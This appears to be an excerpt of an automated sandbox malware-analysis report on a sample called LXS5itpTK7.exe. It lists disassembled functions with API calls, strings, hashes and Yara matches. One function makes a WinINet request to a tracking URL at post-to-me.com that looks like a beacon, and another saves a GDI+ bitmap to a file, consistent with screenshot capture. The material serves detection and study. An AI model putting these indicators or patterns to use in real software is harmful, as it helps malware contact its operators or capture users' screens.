API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 0214B12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0214B152

Part of subcall function 02141188: _SpinWait.LIBCONCRT ref: 021411A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0214B166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0214B198
List.LIBCMT ref: 0214B21B
List.LIBCMT ref: 0214B22A

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: 6aa1d964e230e813ecf8c19674d50d366c9511975bb203df85941767067993d2
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: 74317C31D89655EFCB14EFA4E550ADDB7B2BF04708F05406AC81977641CF31AA54CF90

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 021350C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 021350A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 021350B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0213511C
__Getcoll.LIBCPMT ref: 0213512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0213513B

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: ac7d4f3f2f8fbb846ea7b50f16de0fc65d0f8ee05a3b79a517cb48fe57e49f26
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: 0421ACB2894304EFDB02EFA4C8447DCBBB3BF54725F50801AE485AB280DBB49544CF91

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 021621C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0213DAD7,0213DAD7,00000002,0215ED35,02163951,00000000,?,02156A05,00000002,00000000,00000000,00000000,?,0213CF88,0213DAD7,00000004), ref: 021621CA
_free.LIBCMT ref: 021621FF
_free.LIBCMT ref: 02162226
SetLastError.KERNEL32(00000000,?,0213DAD7), ref: 02162233
SetLastError.KERNEL32(00000000,?,0213DAD7), ref: 0216223C

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 8ffb44da0647d3722cda1b113ef7d0c51a74a4e599d71defaa1899c478fb78e6
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: DE01F4362C5B003F93166B345C4CE3F262EABD2B72B21013CFC2592290EFB089358569

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 02162141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
_free.LIBCMT ref: 02162178
_free.LIBCMT ref: 021621A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 9ac77499d5f07cbfcc6dc19fb2d1ec6e9b9612dae4c22f9c3580e50c937011a0
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: 5AF0A9365C97013FD2162734AC4DB7F362A5BC2F63F150164FD18922D0EF7185328569

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 02147B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 021429A4: TlsGetValue.KERNEL32(?,?,02140DC2,02142ECF,00000000,?,02140DA0,?,?,?,00000000,?,00000000), ref: 021429AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02147BB1

Part of subcall function 0215121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02151241
Part of subcall function 0215121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0215125A
Part of subcall function 0215121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021512D0
Part of subcall function 0215121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021512D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02147BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02147BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02147BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02147BF1

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: a926e9d87bd501193a87a4ddce8c38fc6c34682efdfb3e2b9c026d94dc4ad203
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: F9F0F631A806286FCE25F775C82096EF6679FC0B24B10416ADC1893690DF35DE468ED1

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 0216A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0216A0C4

Part of subcall function 021636D1: HeapFree.KERNEL32(00000000,00000000,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?), ref: 021636E7
Part of subcall function 021636D1: GetLastError.KERNEL32(?,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?,?), ref: 021636F9

_free.LIBCMT ref: 0216A0D6
_free.LIBCMT ref: 0216A0E8
_free.LIBCMT ref: 0216A0FA
_free.LIBCMT ref: 0216A10C

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 45653454c0af62f6973b12b950619cd657ba6c63450527fa1c0a3edf710fc0dc
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 9DF06233685300AB8660EB54E8CEC2E73DAAE047517640995F018E7B11CB71FCF08A99

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 02161991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 021619AF

Part of subcall function 021636D1: HeapFree.KERNEL32(00000000,00000000,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?), ref: 021636E7
Part of subcall function 021636D1: GetLastError.KERNEL32(?,?,0216A35F,?,00000000,?,00000000,?,0216A603,?,00000007,?,?,0216A9F7,?,?), ref: 021636F9

_free.LIBCMT ref: 021619C1
_free.LIBCMT ref: 021619D4
_free.LIBCMT ref: 021619E5
_free.LIBCMT ref: 021619F6

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 03bda82146e43ba304a21f95dc6211d14e6fb225ce919d3bedab3392a999220a
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 70F03071D40310AF9F616F14AC884193B61AF09B2270002A6F416977B2C774D9B2DFCE

Function 0214CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0214CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0214CF67
GetCurrentThread.KERNEL32 ref: 0214CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0214CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0214CF8C

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 1d0dae699a7c095a764f098f569655dfa953c24959086b20eff66513cc332632
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 00F0A036280500DFCA29EF20FA508BBB3B6AFC4610310465DE59F06550CF26A807DBA1

Function 02132E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02132E8E

Part of subcall function 02131321: _wcslen.LIBCMT ref: 02131328
Part of subcall function 02131321: _wcslen.LIBCMT ref: 02131344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 021330A1

Strings

&cc=DE, xrefs: 0213301B, 02133021, 0213307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 02132EBE, 02132FEA, 02133059

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 0afb7cdb841cb3c13b768b3e6241842fb8f5e6f97f81d01376d84fcece4f720e
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 70515195E55344A8E320EFB0BC45B723378EF58712F10643AE528CB2B2E7B1DA44875E

Function 02158937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0215896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02158A23

Strings

csm, xrefs: 02158A0D
fB, xrefs: 02158A15, 02158A1E, 02158A2F

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 6f05550e5bbba17a87b81a0a28d80a835844a34a00ba2769bc54d359b24c64be
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 1B41D634A80269DFCF10DF28C884AAE7BB5AF44328F1581E5ED355B391D7369941CF91

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LXS5itpTK7.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\LXS5itpTK7.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\LXS5itpTK7.exe
API String ID: 2506810119-3460600958
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0215F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LXS5itpTK7.exe,00000104), ref: 0215F9BA
_free.LIBCMT ref: 0215FA85
_free.LIBCMT ref: 0215FA8F

Strings

C:\Users\user\Desktop\LXS5itpTK7.exe, xrefs: 0215F9B1, 0215F9B8, 0215F9E7, 0215FA1F

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\LXS5itpTK7.exe
API String ID: 2506810119-3460600958
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 198713e3a60979330e42fd16b9f23e3b74443614eac9988a0510ed98a0e6eaea
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 4B318271A80268EFDB21DF959C84D9EBBFDEF8A710B1040E6FC2597211D7709A41CB91

Function 0213C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0213C8DE

Strings

ios_base::badbit set, xrefs: 0213C8A1, 0213C8C1
ios_base::eofbit set, xrefs: 0213C8B0
ios_base::failbit set, xrefs: 0213C8AB

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: fee9a5b08e4bccf9fec7fa630e71005cd9f3fa87e6e2917cec23377eb9c9453d
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 49F02BB38802086EDB05E658CC41BEA33999B05315F0480BBDD52BB182EB699A05CBE4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

